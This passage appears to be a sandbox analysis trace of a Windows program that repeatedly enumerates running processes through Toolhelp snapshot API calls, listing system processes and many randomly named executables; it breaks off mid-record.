[0104.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0104.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0104.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0104.096] CloseHandle (hObject=0xbc) returned 1 [0104.096] Sleep (dwMilliseconds=0x12c) [0104.483] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.489] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.648] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.652] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.660] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.674] CloseHandle (hObject=0xc4) returned 1 [0104.674] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.689] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, 